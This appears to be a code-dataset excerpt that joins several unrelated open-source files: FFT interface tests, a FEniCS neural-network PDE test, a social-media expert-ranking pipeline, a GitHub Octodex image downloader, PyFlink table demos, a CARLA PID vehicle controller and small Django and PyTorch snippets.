dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
i = -1
for test_shape, s, kwargs in self.test_data:
try:
for each_axis, length in enumerate(s):
s[each_axis] += i * 2
i *= i
except TypeError:
s += i * 2
i *= i
self.validate(dtype_tuple[1],
test_shape, dtype, s, kwargs)
    def test_dtype_coercion(self):
# Make sure we input a dtype that needs to be coerced
if functions[self.func] == 'r2c':
dtype_tuple = self.io_dtypes['complex']
else:
dtype_tuple = self.io_dtypes['r2c']
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
s = None
self.validate(dtype_tuple[1],
test_shape, dtype, s, kwargs)
def test_planner_effort(self):
'''Test the planner effort arg
'''
dtype_tuple = self.io_dtypes[functions[self.func]]
test_shape = (16,)
for dtype in dtype_tuple[0]:
s = None
if self.axes_kw == 'axis':
kwargs = {'axis': -1}
else:
kwargs = {'axes': (-1,)}
for each_effort in ('FFTW_ESTIMATE', 'FFTW_MEASURE',
'FFTW_PATIENT', 'FFTW_EXHAUSTIVE'):
kwargs['planner_effort'] = each_effort
self.validate(
dtype_tuple[1], test_shape, dtype, s, kwargs)
kwargs['planner_effort'] = 'garbage'
self.assertRaisesRegex(ValueError, 'Invalid planner effort',
self.validate,
*(dtype_tuple[1], test_shape, dtype, s, kwargs))
def test_threads_arg(self):
'''Test the threads argument
'''
dtype_tuple = self.io_dtypes[functions[self.func]]
test_shape = (16,)
for dtype in dtype_tuple[0]:
s = None
if self.axes_kw == 'axis':
kwargs = {'axis': -1}
else:
kwargs = {'axes': (-1,)}
self.check_arg('threads', (1, 2, 5, 10),
dtype_tuple[1], test_shape, dtype, s, kwargs)
kwargs['threads'] = 'bleh'
# Should not work
self.assertRaises(TypeError,
self.validate,
*(dtype_tuple[1], test_shape, dtype, s, kwargs))
def test_overwrite_input(self):
'''Test the overwrite_input flag
'''
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, _kwargs in self.test_data:
s = None
kwargs = _kwargs.copy()
self.validate(dtype_tuple[1], test_shape, dtype, s, kwargs)
self.check_arg(self.overwrite_input_flag, (True, False),
dtype_tuple[1], test_shape, dtype, s, kwargs)
def test_input_maintained(self):
'''Test to make sure the input is maintained by default.
'''
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
input_array = dtype_tuple[1](test_shape, dtype)
orig_input_array = input_array.copy()
getattr(self.test_interface, self.func)(
input_array, s, **kwargs)
self.assertTrue(
numpy.alltrue(input_array == orig_input_array))
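# A standalone illustration (not part of the suite) of the monkeypatching
# pattern used by check_arg above: temporarily swap an attribute for a
# recording fake, then restore the original in a finally block. math.sqrt is
# just a convenient stand-in here.
def _capture_calls_sketch():
    import math
    calls = []
    real_sqrt = math.sqrt
    def fake_sqrt(*args, **kwargs):
        calls.append((args, kwargs))
        return real_sqrt(*args, **kwargs)
    try:
        math.sqrt = fake_sqrt
        math.sqrt(4.0)
    finally:
        math.sqrt = real_sqrt  # always restore the original attribute
    return calls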
class InterfacesNumpyFFTTestIFFT(InterfacesNumpyFFTTestFFT):
func = 'ifft'
class InterfacesNumpyFFTTestRFFT(InterfacesNumpyFFTTestFFT):
func = 'rfft'
class InterfacesNumpyFFTTestIRFFT(InterfacesNumpyFFTTestFFT):
func = 'irfft'
realinv = True
class InterfacesNumpyFFTTestHFFT(InterfacesNumpyFFTTestFFT):
func = 'hfft'
realinv = True
class InterfacesNumpyFFTTestIHFFT(InterfacesNumpyFFTTestFFT):
func = 'ihfft'
class InterfacesNumpyFFTTestFFT2(InterfacesNumpyFFTTestFFT):
axes_kw = 'axes'
    func = 'fft2'
test_shapes = (
((128, 64), {'axes': None}),
((128, 32), {'axes': None}),
((128, 32, 4), {'axes': (0, 2)}),
((59, 100), {'axes': (-2, -1)}),
((64, 128, 16), {'axes': (0, 2)}),
((4, 6, 8, 4), {'axes': (0, 3)}),
)
invalid_args = (
((100,), ((100, 200),), ValueError, 'Shape error'),
((100, 200), ((100, 200, 100),), ValueError, 'Shape error'),
((100,), ((100, 200), (-3, -2, -1)), ValueError, 'Shape error'),
((100, 200), (100, -1), TypeError, ''),
((100, 200), ((100, 200), (-3, -2)), IndexError, 'Invalid axes'),
((100, 200), ((100,), (-3,)), IndexError, 'Invalid axes'))
def test_shape_and_s_different_lengths(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, _kwargs in self.test_data:
kwargs = copy.copy(_kwargs)
try:
s = s[1:]
except TypeError:
self.skipTest('Not meaningful test on 1d arrays.')
del kwargs['axes']
self.validate(dtype_tuple[1],
test_shape, dtype, s, kwargs)
class InterfacesNumpyFFTTestIFFT2(InterfacesNumpyFFTTestFFT2):
func = 'ifft2'
class InterfacesNumpyFFTTestRFFT2(InterfacesNumpyFFTTestFFT2):
func = 'rfft2'
class InterfacesNumpyFFTTestIRFFT2(InterfacesNumpyFFTTestFFT2):
func = 'irfft2'
realinv = True
class InterfacesNumpyFFTTestFFTN(InterfacesNumpyFFTTestFFT2):
    func = 'fftn'
test_shapes = (
((128, 32, 4), {'axes': None}),
((64, 128, 16), {'axes': (0, 1, 2)}),
((4, 6, 8, 4), {'axes': (0, 3, 1)}),
((4, 6, 8, 4), {'axes': (0, 3, 1, 2)}),
)
class InterfacesNumpyFFTTestIFFTN(InterfacesNumpyFFTTestFFTN):
func = 'ifftn'
class InterfacesNumpyFFTTestRFFTN(InterfacesNumpyFFTTestFFTN):
func = 'rfftn'
class InterfacesNumpyFFTTestIRFFTN(InterfacesNumpyFFTTestFFTN):
func = 'irfftn'
realinv = True
test_cases = (
InterfacesNumpyFFTTestModule,
InterfacesNumpyFFTTestFFT,
InterfacesNumpyFFTTestIFFT,
InterfacesNumpyFFTTestRFFT,
InterfacesNumpyFFTTestIRFFT,
InterfacesNumpyFFTTestHFFT,
InterfacesNumpyFFTTestIHFFT,
InterfacesNumpyFFTTestFFT2,
InterfacesNumpyFFTTestIFFT2,
InterfacesNumpyFFTTestRFFT2,
InterfacesNumpyFFTTestIRFFT2,
InterfacesNumpyFFTTestFFTN,
InterfacesNumpyFFTTestIFFTN,
InterfacesNumpyFFTTestRFFTN,
InterfacesNumpyFFTTestIRFFTN,)
#test_set = {'InterfacesNumpyFFTTestHFFT': ('test_valid',)}
test_set = None
if __name__ == '__main__':
run_test_suites(test_cases, test_set)
| 1.304688 | 1 |
qs-engine/settings.py | kirte2849/Quickspy | 1 | 12769968 | ###Database
#database type Option:(mongodb, mysql, redis)
DB_TYPE = 'mongodb'
#database ip
DB_HOST = 'localhost'
#database port
DB_PORT = '1'
#username
#USERNAME = None
#password
#PASSWORD = None
#database name
DB_DBNAME = 'quickspy'
###
| 1.632813 | 2 |
dnn_biot/test_dnn_biot.py | AasmundResell/FEniCS-Brain-Flow | 0 | 12769969 | from fenics import *
from matplotlib.pyplot import show
from dolfin_adjoint import *
from ufl_dnn.neural_network import ANN
class BoundaryOuter(SubDomain):
def inside(self, x, on_boundary):
return on_boundary
def a_u(u, v):
return my * (inner(grad(u), grad(v)) + inner(grad(u), nabla_grad(v))) * dx
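# Note: inner(grad(u), grad(v)) + inner(grad(u), nabla_grad(v)) equals
# 2*inner(sym(grad(u)), sym(grad(v))), so a_u is the standard linear
# elasticity form 2*my*inner(eps(u), eps(v))*dx written out term by term.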
def a_p(K, p, q):
return K * dot(grad(p), grad(q)) * dx
def b(s, v):
return s * div(v) * dx
def c(alpha, p, q):
return alpha / Lambda * dot(p, q) * dx
def F(f, v):
return dot(f, v) * dx
def test_SteadyBiot_dnn():
import sympy as sym
x, y = sym.symbols("x[0], x[1]")
my = 1 / 3
Lambda = 16666
alpha = 1.0
c = 1.0
K = 1.0
u = (
sym.sin(2 * sym.pi * y) * (-1 + sym.cos(2 * sym.pi * x))
+ 1 / (my + Lambda) * sym.sin(sym.pi * x) * sym.sin(sym.pi * y)
)
v = (
sym.sin(2 * sym.pi * x) * (1 - sym.cos(2 * sym.pi * y))
+ 1 / (my + Lambda) * sym.sin(sym.pi * x) * sym.sin(sym.pi * y)
)
p1 = -1 * sym.sin(sym.pi * x) * sym.sin(sym.pi * y) # p Network1
p0 = Lambda * (sym.diff(u, x, 1) + sym.diff(v, y, 1)) - alpha * p1
fx,fy = 0.0,0.0 #force term
g_ex = -K * (sym.diff(p1, x, 2) + sym.diff(p1, y, 2))
variables = [
u,
v,
p0,
p1,
my,
Lambda,
alpha,
c,
K,
fx,
fy,
g_ex,
]
variables = [sym.printing.ccode(var) for var in variables] # Generate C++ code
UFLvariables = [Expression(var, degree=2) for var in variables]
(
u,
v,
p0,
p1,
my,
Lambda,
alpha,
c,
K,
fx,
fy,
g_ex,
) = UFLvariables
f = as_vector((fx, fy))
mesh = UnitSquareMesh(10, 10)
g = [g_ex]
alpha = [1, alpha]
c = [c]
K = [K]
# Generate function space
V = VectorElement("CG", triangle, 2) # Displacement
Q_0 = FiniteElement("CG", triangle, 1) # Total pressure
Q_1 = FiniteElement("CG", triangle, 1) #Network 1
mixedElement = []
mixedElement.append(V)
mixedElement.append(Q_0)
mixedElement.append(Q_1)
W_element = MixedElement(mixedElement)
W = FunctionSpace(mesh, W_element)
test = TestFunction(W)
q = split(test) # q[0] = v, q[1],q[2],... = q_0,q_1,...
trial = TrialFunction(W)
p_ = split(trial) # p_[0] = u_, p_[1],p_[2],... = p_0,p_1,...
up_n = Function(W)
p_n = split(up_n) # p_n[0] = u_n, p_n[1],p_n[2],... = p0_n,p1_n,...
# variational formulation
sources = [] # Contains the source term for each network
innerProdP = (
[]
) # Contains the inner product of the gradient of p_j for each network
dotProdP = [] # Contains the dot product of alpha_j & p_j,
bcs_D = [] # Contains the terms for the Dirichlet boundaries
integrals_N = [] # Contains the integrals for the Neumann boundaries
    x, y = SpatialCoordinate(mesh)
    layers = [4, 10, 1]

    # V and Q_1 above are UFL elements, not function spaces, so build a
    # scalar CG1 space for the network-driven Poisson sub-problem and the
    # observation field (the exact pressure p1).
    Q = FunctionSpace(mesh, "CG", 1)
    g_ex = project(g_ex, Q)
    obs = project(p1, Q)
    plot(g_ex)
    show()

    bias = [True, True]
    net = ANN(layers, bias=bias, mesh=mesh)

    u_trial = TrialFunction(Q)
    v_test = TestFunction(Q)
    E = K[0] * inner(grad(u_trial), grad(v_test)) * dx + net(x, y) * v_test * dx

    bcs = DirichletBC(Q, Constant(0.0), "on_boundary")
    hat_u = Function(Q)
    # Solve PDE
    solve(lhs(E) == rhs(E), hat_u, bcs)
    # L^2 error as loss
    loss = assemble((hat_u - obs) ** 2 * dx)  # loss function
# Define reduced formulation of problem
hat_loss = ReducedFunctional(loss, net.weights_ctrls())
# Use scipy L - BFGS optimiser
opt_theta = minimize(
hat_loss, options={"disp": True, "gtol": 1e-12, "ftol": 1e-12, "maxiter": 80}
)
net.set_weights(opt_theta)
#assert assemble(net(x, y) ** 2 * dx) < 1e-6
# u_test = Function(V)
# E_test = K * inner(grad(u), grad(v)) * dx + net(x, y) * v * dx
# solve(lhs(E_test) == rhs(E_test),u_test,bcs)
# f_pred = project(net(x,y),W.sub(2))
# plot(f_pred)
# show()
# plot(u_test)
# show()
    u_e = Expression((variables[0], variables[1]), degree=2)
    V_e = VectorFunctionSpace(mesh, "P", 2)
    Q_e = FunctionSpace(mesh, "P", 1)
    u_e = project(u_e, V_e)
    p_e1 = project(UFLvariables[3], Q_e)

    # Only the scalar solve above produced a computed field (hat_u), which
    # approximates the exact pressure p1, so write out and compare that.
    vtkPfile = File("solution_steady/p1.pvd")
    vtkPfile << hat_u
    vtkPEfile = File("solution_steady/p_e1.pvd")
    vtkPEfile << p_e1

    er2P = errornorm(p_e1, hat_u, "L2")
    print("Error L2 for pressure = ", er2P)

    plot(hat_u)
    show()
if __name__ == "__main__":
test_SteadyBiot_dnn()
| 2.609375 | 3 |
knowledge_extractor/pipeline.py | janez87/social-knowledge-extractor | 5 | 12769970 | <reponame>janez87/social-knowledge-extractor<filename>knowledge_extractor/pipeline.py
import pprint
import pandas as pd
import collections
from scipy.spatial.distance import cosine
from .strategies.AST import AST
from .strategies.EHE import EHE
from flask import current_app
class Pipeline:
def createSpace(self,seeds):
print("Creating the vector space")
space = []
for k,v in seeds.items():
space += v
space = set(space)
return space
def createFeatureVector(self,space,data):
vector = {}
for k,v in data.items():
c = collections.Counter(v)
for s in space:
if s not in vector:
vector[s] = {}
vector[s][k] = c[s]
return pd.DataFrame(vector)
def getSeeds(self):
query = {"id_experiment":self.experiment_id, "starting":True, "hub":False}
return self.db.getSeeds(query)
def getCandidates(self):
query = {"id_experiment":self.experiment_id, "starting":False, "hub":False}
return self.db.getCandidates(query)
def computeSeedVectors(self,seeds):
mentions = {}
ast_mentions = {}
ehe = EHE(self.db,self.expertFile)
ast = AST(self.db,self.expertFile)
for seed in seeds:
            # compute the list of mentioned entities
pprint.pprint(seed)
mentions[seed["handle"]] = ehe.getEntities(seed)
ast_mentions[seed["handle"]] = ast.getEntities(seed)
pprint.pprint(ast_mentions)
space_ehe = self.createSpace(mentions)
space_ast = self.createSpace(ast_mentions)
print("Creating feature vector for the seed")
        seed_feature_vectors_ast = self.createFeatureVector(space_ast, ast_mentions)
        #self.db.store_feature_ast_vector(seed_feature_vectors_ast,self.experiment_id)
        # weight AST features by (1 - alfa) and EHE features by alfa
        seed_feature_vectors_ast = seed_feature_vectors_ast * (1 - self.alfa)
        seed_feature_vectors_ehe = self.createFeatureVector(space_ehe, mentions) * self.alfa
seed_feature_vectors = seed_feature_vectors_ast.join(seed_feature_vectors_ehe)
return {
"fv":seed_feature_vectors,
"space_ehe":space_ehe,
"space_ast":space_ast
}
def createCentroid(self,seeds):
return seeds.mean()
def computeCandidatesVectors(self,cands,space_ast,space_ehe):
mentions = {}
ast_mentions = {}
ehe = EHE(self.db,self.expertFile)
ast = AST(self.db,self.expertFile)
for cand in cands:
            # compute the list of mentioned entities
print("Getting mentions for candidate " + cand["handle"])
mentions[cand["handle"]] = ehe.getEntities(cand)
ast_mentions[cand["handle"]] = ast.getEntities(cand)
print("Creating feature vector for the candidates")
cands_feature_vectors_ast = self.createFeatureVector(space_ast,ast_mentions)*(1-self.alfa)
cands_feature_vectors_ehe = self.createFeatureVector(space_ehe,mentions)*self.alfa
cands_feature_vectors = cands_feature_vectors_ast.join(cands_feature_vectors_ehe)
return cands_feature_vectors
def run(self):
feature_vectors = {}
seeds = self.getSeeds()
candidates = self.getCandidates()
print("Computing seeds fv")
seeds_components = self.computeSeedVectors(seeds)
feature_vectors["seeds"] = seeds_components["fv"]
print("Computing candidates fv")
pprint.pprint(seeds_components["fv"])
feature_vectors["candidates"] = self.computeCandidatesVectors(candidates,seeds_components["space_ast"],seeds_components["space_ehe"])
centroid = self.createCentroid(feature_vectors["seeds"])
centroid = centroid.values
scores = feature_vectors["candidates"].apply(lambda row: 1-cosine(row,centroid),axis=1)
print("Saving the rankings")
self.db.saveScores(scores,self.experiment_id)
return scores
def __init__(self,db,experiment_id):
self.alfa=0.7
self.db=db
self.experiment_id = experiment_id
self.expertFile = self.db.getExpertTypes(experiment_id)
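# A toy, self-contained sketch of the ranking step in run(): score each
# candidate feature vector by cosine similarity to the seed centroid. The
# feature names and counts below are made up for illustration.
def _rank_sketch():
    seeds = pd.DataFrame({'python': [3, 1], 'java': [0, 2]})
    cands = pd.DataFrame({'python': [2, 0], 'java': [1, 3]})
    centroid = seeds.mean().values
    return cands.apply(lambda row: 1 - cosine(row, centroid), axis=1)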
if __name__ == "__main__":
import mongo_manager
import configuration
from bson import ObjectId
db_manager = mongo_manager.MongoManager(configuration.db_name)
kn = Pipeline(db_manager, ObjectId('594142ebd576065c263fc798'))
kn.run()
| 2.453125 | 2 |
apps/external_apps/swaps/admin.py | indro/t2c | 3 | 12769971 | <filename>apps/external_apps/swaps/admin.py
from django.contrib import admin
from swaps.models import Offer, Swap
class OfferAdmin(admin.ModelAdmin):
list_display = ('offerer', 'short_description', 'offering', 'want', 'state', 'swapped_by')
list_filter = ('offerer', 'state')
search_fields = ('short_description', 'offering', 'want')
admin.site.register(Offer, OfferAdmin)
class SwapAdmin(admin.ModelAdmin):
list_display = ('proposing_offer', 'responding_offer', 'state', 'conflicted_by')
list_filter = ('state',)
admin.site.register(Swap, SwapAdmin) | 1.703125 | 2 |
py/skr/commands/cmd_octodex.py | er1iang/awesome-pyscript | 3 | 12769972 | import click
import logging
import os
import requests
import xml.etree.ElementTree as ET
from multiprocessing.dummy import Pool
class OctocatsDownloader:
feeds_url = "http://feeds.feedburner.com/Octocats"
def __init__(self, output="octocats", max_threads=5, force=False, logger=None):
if not os.path.exists(output):
os.mkdir(output)
self.output = output
self.session = requests.Session()
self.pool = Pool(max_threads)
self.force = force
self.skip_count = 0
self.update_count = 0
self.feeds = None
self.logger = logger or logging.getLogger()
def join_path(self, path):
return os.path.join(self.output, path)
def download_job(self, img_element):
src = img_element.get("src")
filename = src.rsplit("/", 1)[-1]
path = self.join_path(filename)
if not self.force and os.path.exists(path):
self.skip_count += 1
self.logger.info("%s already exists! skip downloading ...", filename)
return
img = self.session.get(src).content
with click.open_file(path, "wb") as fp:
fp.write(img)
self.update_count += 1
self.logger.info("%s successfully downloaded.", filename)
def fetch_feeds(self):
self.logger.info("fetching RSS feeds ...")
response = self.session.get(self.feeds_url)
with click.open_file(self.join_path("Octocats.xml"), "w") as fp:
fp.write(response.text)
self.feeds = ET.fromstring(response.text)
return self.feeds
def download(self):
feeds = self.feeds or self.fetch_feeds()
# http://www.w3school.com.cn/xml/xml_namespaces.asp
img_elements = feeds.iterfind(
".//atom:entry/atom:content/atom:div/atom:a/atom:img",
{"atom": "http://www.w3.org/2005/Atom"},
)
self.logger.info("dispatching download jobs ...")
self.pool.map(self.download_job, img_elements)
self.logger.info(
"all task done, %d updated, %d skipped, enjoy!",
self.update_count,
self.skip_count,
)
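# A standalone illustration of the namespaced XPath used in download():
# Atom elements only match when the namespace mapping is supplied explicitly.
def _namespace_sketch():
    xml = '<feed xmlns="http://www.w3.org/2005/Atom"><entry/></feed>'
    root = ET.fromstring(xml)
    return root.findall('atom:entry', {'atom': 'http://www.w3.org/2005/Atom'})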
@click.command()
@click.pass_context
@click.option(
"-o",
"--output",
type=click.Path(file_okay=False, writable=True),
default="octocats",
help="The directory to save images.",
)
@click.option(
"-m",
"--max-threads",
type=click.IntRange(1, 10),
default=5,
help="Max number of thread pool to download image.",
)
@click.option("-p", "--proxy", type=str, help="HTTP Proxy")
@click.option(
"-f", "--force", is_flag=True, help="Fore download images even they exists."
)
def cli(ctx, output, max_threads, proxy, force):
"""
Download Octocats from https://octodex.github.com
"""
o = OctocatsDownloader(output, max_threads, force, logger=ctx.obj.logger)
if proxy:
o.session.proxies = {"http": proxy}
o.download()
| 2.546875 | 3 |
bigdata_study/pyflink1.x/core/table_operator.py | kingreatwill/penter | 13 | 12769973 | from pyflink.table import *
from pyflink.table.expressions import col, lit, concat
from pyflink.table.window import Tumble
def demo01():
# environment configuration
t_env = BatchTableEnvironment.create(environment_settings=EnvironmentSettings.new_instance().in_batch_mode().use_blink_planner().build())
# register Orders table and Result table sink in table environment
source_data_path = "/path/to/source/directory/"
result_data_path = "/path/to/result/directory/"
source_ddl = f"""
create table Orders(
a VARCHAR,
b BIGINT,
c BIGINT,
rowtime TIMESTAMP(3),
WATERMARK FOR rowtime AS rowtime - INTERVAL '1' SECOND
) with (
'connector' = 'filesystem',
'format' = 'csv',
'path' = '{source_data_path}'
)
"""
t_env.execute_sql(source_ddl)
sink_ddl = f"""
create table `Result`(
a VARCHAR,
cnt BIGINT
) with (
'connector' = 'filesystem',
'format' = 'csv',
'path' = '{result_data_path}'
)
"""
t_env.execute_sql(sink_ddl)
# specify table program
orders = t_env.from_path("Orders") # schema (a, b, c, rowtime)
orders.group_by("a").select(orders.a, orders.b.count.alias('cnt')).execute_insert("result").wait()
orders.where(orders.a == 'red')
orders.filter(orders.b % 2 == 0)
orders.add_columns(concat(orders.c, 'sunny'))
orders.add_or_replace_columns(concat(orders.c, 'sunny').alias('desc'))
orders.drop_columns(orders.b, orders.c)
orders.rename_columns(orders.b.alias('b2'), orders.c.alias('c2'))
orders.group_by(orders.a).select(orders.a, orders.b.sum.alias('d'))
# tab.group_by(tab.key).select(tab.key, tab.value.avg.alias('average'))
# tab.group_by("key").select("key, value.avg as average")
result = orders.filter(orders.a.is_not_null & orders.b.is_not_null & orders.c.is_not_null) \
.select(orders.a.lower_case.alias('a'), orders.b, orders.rowtime) \
.window(Tumble.over(lit(1).hour).on(orders.rowtime).alias("hourly_window")) \
.group_by(col('hourly_window'), col('a')) \
.select(col('a'), col('hourly_window').end.alias('hour'), col('b').avg.alias('avg_billing_amount'))
"""
SELECT user, SUM(amount)
FROM Orders
GROUP BY TUMBLE(rowtime, INTERVAL '1' DAY), user
"""
    # SQL built-in functions: https://ci.apache.org/projects/flink/flink-docs-release-1.12/dev/table/functions/systemFunctions.html
    # SQL data types: https://ci.apache.org/projects/flink/flink-docs-release-1.12/dev/table/types.html
    # SQL equivalents of the Table API operators: https://ci.apache.org/projects/flink/flink-docs-release-1.12/dev/table/sql/queries.html
    # The various window syntaxes: https://ci.apache.org/projects/flink/flink-docs-release-1.12/dev/table/tableApi.html#group-windows
    # https://ci.apache.org/projects/flink/flink-docs-release-1.12/dev/table/tableApi.html
    # https://ci.apache.org/projects/flink/flink-docs-release-1.12/dev/python/table-api-users-guide/operations.html
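# A minimal self-contained sketch (table and column names are illustrative):
# the same kind of group-by aggregation as above, but on an in-memory table
# built with from_elements, so it needs no filesystem connector.
def demo_in_memory():
    t_env = BatchTableEnvironment.create(
        environment_settings=EnvironmentSettings.new_instance().in_batch_mode().use_blink_planner().build())
    tab = t_env.from_elements([('a', 1), ('a', 2), ('b', 5)], ['k', 'v'])
    tab.group_by(tab.k).select(tab.k, tab.v.sum.alias('total')).execute().print()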
if __name__ == '__main__':
demo01() | 2.375 | 2 |
Module/startingInventory.py | 1234567890num/KH2Randomizer | 7 | 12769974 | from Class.locationClass import KH2StartingItem
class StartingInventory:
    @staticmethod
    def generateStartingInventory(inventory, itemsToAdd):
for item in itemsToAdd:
inventory.setReward(int(item))
    @staticmethod
    def getOptions():
return {
"moduleName": "Sora's Starting Inventory",
"options":{
"Abilities": [
{138: "Scan"},
{404: "No Experience"},
{158: "Aerial Recovery"},
{82: "Guard"}
],
"Items": [
{537: "Hades Cup Trophy"},
{369: "Membership Card"}
],
"Proofs": [
{593: "Proof of Connection"},
{594: "Proof of Nonexistence"},
{595: "Proof of Peace"},
{524: "Promise Charm"}
]
}
}
    @staticmethod
    def getIdConverter():
return {
'138':"Scan",
'537':"Hades Cup Trophy",
'369':"Membership Card",
'404':"No Experience",
'158':"Aerial Recovery",
'82':"Guard",
'593':"Proof of Connection",
'594':"Proof of Nonexistence",
'595':"Proof of Peace",
'524':"Promise Charm"
} | 2.875 | 3 |
opencda/core/actuation/pid_controller.py | xiaxin2000/OpenCDA-Documents | 1 | 12769975 | # -*- coding: utf-8 -*-
"""
PID Control Class
"""
# Author: <NAME> <<EMAIL>>
# License: MIT
from collections import deque
import math
import numpy as np
import carla
class Controller:
"""
PID Controller implementation.
Parameters
----------
args : dict
The configuration dictionary parsed from yaml file.
Attributes
----------
_lon_ebuffer : deque
A deque buffer that stores longitudinal control errors.
_lat_ebuffer : deque
A deque buffer that stores latitudinal control errors.
current_transform : carla.transform
Current ego vehicle transformation in CARLA world.
current_speed : float
Current ego vehicle speed.
past_steering : float
        Steering angle from previous control step.
"""
def __init__(self, args):
# longitudinal related
self.max_brake = args['max_brake']
self.max_throttle = args['max_throttle']
self._lon_k_p = args['lon']['k_p']
self._lon_k_d = args['lon']['k_d']
self._lon_k_i = args['lon']['k_i']
self._lon_ebuffer = deque(maxlen=10)
# lateral related
self.max_steering = args['max_steering']
self._lat_k_p = args['lat']['k_p']
self._lat_k_d = args['lat']['k_d']
self._lat_k_i = args['lat']['k_i']
self._lat_ebuffer = deque(maxlen=10)
# simulation time-step
self.dt = args['dt']
# current speed and localization retrieved from sensing layer
self.current_transform = None
self.current_speed = 0.
# past steering
self.past_steering = 0.
self.dynamic = args['dynamic']
def dynamic_pid(self):
"""
Compute kp, kd, ki based on current speed.
"""
pass
def update_info(self, ego_pos, ego_spd):
"""
Update ego position and speed to controller.
Parameters
----------
ego_pos : carla.location
Position of the ego vehicle.
ego_spd : float
Speed of the ego vehicle
Returns
-------
"""
self.current_transform = ego_pos
self.current_speed = ego_spd
if self.dynamic:
self.dynamic_pid()
def lon_run_step(self, target_speed):
"""
Parameters
----------
target_speed : float
Target speed of the ego vehicle.
Returns
-------
acceleration : float
Desired acceleration value for the current step
to achieve target speed.
"""
        error = target_speed - self.current_speed
        self._lon_ebuffer.append(error)
        if len(self._lon_ebuffer) >= 2:
            _de = (self._lon_ebuffer[-1] - self._lon_ebuffer[-2]) / self.dt
            _ie = sum(self._lon_ebuffer) * self.dt
        else:
            _de = 0.0
            _ie = 0.0
        return np.clip((self._lon_k_p * error) +
                       (self._lon_k_d * _de) +
                       (self._lon_k_i * _ie),
                       -1.0, 1.0)
"""
Generate the throttle command based on current speed and target speed
Args:
-target_location (carla.loaction): Target location.
Returns:
-current_steering (float): Desired steering angle value
for the current step to achieve target location.
"""
def lat_run_step(self, target_location):
"""
        Generate the steering command based on the current pose and the
        target location
Parameters
----------
target_location : carla.location
Target location.
Returns
-------
current_steering : float
Desired steering angle value for the current step to
achieve target location.
"""
v_begin = self.current_transform.location
v_end = v_begin + carla.Location(
x=math.cos(
math.radians(
self.current_transform.rotation.yaw)), y=math.sin(
math.radians(
self.current_transform.rotation.yaw)))
v_vec = np.array([v_end.x - v_begin.x, v_end.y - v_begin.y, 0.0])
w_vec = np.array([target_location.x -
v_begin.x, target_location.y -
v_begin.y, 0.0])
_dot = math.acos(np.clip(np.dot(
w_vec, v_vec) / (np.linalg.norm(w_vec) * np.linalg.norm(v_vec)),
-1.0, 1.0))
_cross = np.cross(v_vec, w_vec)
if _cross[2] < 0:
_dot *= -1.0
        self._lat_ebuffer.append(_dot)
        if len(self._lat_ebuffer) >= 2:
            _de = (self._lat_ebuffer[-1] - self._lat_ebuffer[-2]) / self.dt
            _ie = sum(self._lat_ebuffer) * self.dt
        else:
            _de = 0.0
            _ie = 0.0
return np.clip((self._lat_k_p * _dot) + (self._lat_k_d *
_de) + (self._lat_k_i * _ie), -1.0, 1.0)
def run_step(self, target_speed, waypoint):
"""
Execute one step of control invoking both lateral and longitudinal
PID controllers to reach a target waypoint at a given target_speed.
Parameters
----------
target_speed : float
Target speed of the ego vehicle.
        waypoint : carla.location
Target location.
Returns
-------
control : carla.VehicleControl
Desired vehicle control command for the current step.
"""
# control class for carla vehicle
control = carla.VehicleControl()
# emergency stop
if target_speed == 0 or waypoint is None:
control.steer = 0.0
control.throttle = 0.0
control.brake = 1.0
control.hand_brake = False
return control
acceleration = self.lon_run_step(target_speed)
current_steering = self.lat_run_step(waypoint)
if acceleration >= 0.0:
control.throttle = min(acceleration, self.max_throttle)
control.brake = 0.0
else:
control.throttle = 0.0
control.brake = min(abs(acceleration), self.max_brake)
# Steering regulation: changes cannot happen abruptly, can't steer too
# much.
if current_steering > self.past_steering + 0.2:
current_steering = self.past_steering + 0.2
elif current_steering < self.past_steering - 0.2:
current_steering = self.past_steering - 0.2
if current_steering >= 0:
steering = min(self.max_steering, current_steering)
else:
steering = max(-self.max_steering, current_steering)
control.steer = steering
control.hand_brake = False
control.manual_gear_shift = False
self.past_steering = steering
return control
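# Minimal usage sketch (the configuration values below are illustrative, not
# taken from an OpenCDA yaml file):
#   args = {'max_brake': 1.0, 'max_throttle': 1.0, 'max_steering': 0.3,
#           'lon': {'k_p': 1.0, 'k_d': 0.1, 'k_i': 0.01},
#           'lat': {'k_p': 1.0, 'k_d': 0.1, 'k_i': 0.01},
#           'dt': 0.05, 'dynamic': False}
#   controller = Controller(args)
#   controller.update_info(ego_pos, ego_spd)
#   control = controller.run_step(target_speed=20.0, waypoint=target_location)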
| 3.03125 | 3 |
fedlab_benchmarks/feature-skew-fedavg/models.py | KarhouTam/FedLab-benchmarks | 46 | 12769976 | <gh_stars>10-100
import torch
import torch.nn as nn
import torch.nn.functional as F
"""
Code below is from NIID-bench official code:
https://github.com/Xtra-Computing/NIID-Bench
"""
class SimpleCNNMNIST(nn.Module):
def __init__(self, input_dim, hidden_dims, output_dim=10):
super(SimpleCNNMNIST, self).__init__()
self.conv1 = nn.Conv2d(1, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
# for now, we hard coded this network
# i.e. we fix the number of hidden layers i.e. 2 layers
self.fc1 = nn.Linear(input_dim, hidden_dims[0])
self.fc2 = nn.Linear(hidden_dims[0], hidden_dims[1])
self.fc3 = nn.Linear(hidden_dims[1], output_dim)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 4 * 4)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
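# A minimal usage sketch (hidden layer sizes are illustrative): for 28x28
# MNIST inputs the flattened size after the two conv/pool stages is
# 16 * 4 * 4 = 256, matching the view() call in forward().
if __name__ == "__main__":
    model = SimpleCNNMNIST(input_dim=16 * 4 * 4, hidden_dims=[120, 84])
    dummy = torch.randn(2, 1, 28, 28)  # a batch of two grayscale images
    print(model(dummy).shape)  # expected: torch.Size([2, 10])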
| 3.046875 | 3 |
shop/forms.py | KWeselski/Shop-Django | 0 | 12769977 | <filename>shop/forms.py<gh_stars>0
from django import forms
class CouponForm(forms.Form):
